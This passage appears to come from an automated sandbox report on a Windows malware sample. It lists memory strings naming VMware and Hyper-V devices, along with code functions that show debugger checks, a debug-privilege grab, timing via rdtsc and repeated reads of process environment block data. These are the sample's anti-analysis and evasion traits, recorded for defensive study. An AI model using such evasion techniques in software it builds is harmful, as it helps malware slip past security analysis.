          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Local
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.350297745.0000000008778000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000}
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}&
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}al
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}sJ
          Source: explorer.exe, 00000003.00000000.310676128.00000000067C2000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000m32)
          Source: cscript.exe, 00000006.00000002.567306194.0000000003670000.00000004.00000020.sdmpBinary or memory string: Hyper-V RAW
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}ackagesnH
          Source: explorer.exe, 00000003.00000000.333765918.000000000EEEF000.00000004.00000001.sdmpBinary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}0G?
          Source: explorer.exe, 00000003.00000000.314207497.00000000086C9000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
          Source: explorer.exe, 00000003.00000000.339354513.0000000000B7D000.00000004.00000020.sdmpBinary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10011C4A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10011C4A EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_00405C49 GetModuleHandleA,LoadLibraryA,GetProcAddress,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10007C40 GetProcessHeap,HeapAlloc,GetProcessHeap,HeapFree,GetProcessHeap,HeapReAlloc,
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_004088D0 rdtsc
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100217EA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_100219FE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021AAF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021AEE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 0_2_10021B2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B3F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exeCode function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B320A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B490AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B83884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B040E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B058EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B9B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B87016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC2073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B20050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B851BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B361A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B869A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2C182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0B1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B941E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B24120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B24120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0B171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0C962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2B944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B052A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B44A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B05210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B05210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B23A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B18A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B4927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BBB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BCEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B94257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B09240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B34BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B32397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BBD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B11B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B303E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B2DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B853CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B33B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0DB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0F358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B0DB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B1849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC14FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B3BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BD740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00B86C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Y1p8VPvyU2.exe Code function: 1_2_00BC1C06 mov eax, dword ptr fs:[00000030h]
